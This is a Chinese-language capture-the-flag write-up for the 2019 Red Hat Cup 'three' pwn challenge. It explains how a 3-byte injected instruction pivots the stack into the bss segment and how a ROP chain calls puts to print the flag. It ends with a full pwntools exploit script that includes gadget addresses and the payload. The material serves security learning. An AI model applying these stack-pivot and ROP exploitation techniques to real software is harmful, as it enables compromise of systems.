2019 红帽杯 three 经验总结 PWN

这题感觉要对汇编语言要比较熟悉会更容易做出来…
程序逻辑分析：

文章图片

文章图片

文章图片

前两个函数通过读取flag文件的内容，并将存放flag的chunk的地址放入bss段中

文章图片

在程序中可以输入3个字节的指令，之后再执行这三个指令，所以目的是植入3个字节的shellcode来获取flag
利用思路：

通过调试发现在执行call eax 之前， ecx寄存器中存放的是bss段的地址0x80f6cc0，而前面输入的name的地址是从0x80f6cc0开始的，那么可以考虑把栈迁移到bss段，之后进行rop将flag读出来
具体步骤：

植入的三字节指令为
mov esp, [ecx]; ret;
完成栈迁移

2.完成栈迁移后需要考虑的是如何将flag读出

文章图片

观察汇编代码发现， puts函数的参数放在寄存器eax中，那么可以考虑将指向flag的地址存入eax中在利用puts输出

调试中发现
0x80F6C80(bss) -> 0x5703440(heap) -> flag
那么可以先利用pop eax 将0x80F6C80 存入 eax中
之后再执行 mov eax, [eax] 将指向flag的地址存入eax中，最后再跳转到
push eax
call sub_80506F0
调用puts函数将flag输出

不得不说学长强啊…
EXP:

#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context.log_level = 'debug' context(os='linux',arch='i386', terminal = ['tmux', 'splitw', '-h'])def rsl(c,s): r.recvuntil(c) r.sendline(s)def rs(c,s): r.recvuntil(c) r.send(s)def pwn(local, d, ip = 0, port = 0): global r if local == 0: r = process("./irpwn") if d == 1: gdb.attach(r) else: r = remote(ip, port) ''' 0x80C11E6: pop eax; ret; 0x80A7EBB: mov eax, DWORD PTR [eax]; ret; ''' flag = p32(0x080F6CC4)+p32(0x080C11E6)+p32(0x80F6C80)+p32(0x080A7EBB)+p32(0x08048B82) + p64(0x080C11E6) payload =asm('mov esp,[ecx]; ret') rsl("Give me a index:\n",str(0)) rsl("Three is good number,I like it very much!\n",payload) rsl("Leave you name of size:\n", str(len(flag))) raw_input() rs("Tell me:\n", flag) r.recv(20) r.interactive()if __name__ == '__main__': pwn(0, 1)

【2019 红帽杯 three 经验总结】结果：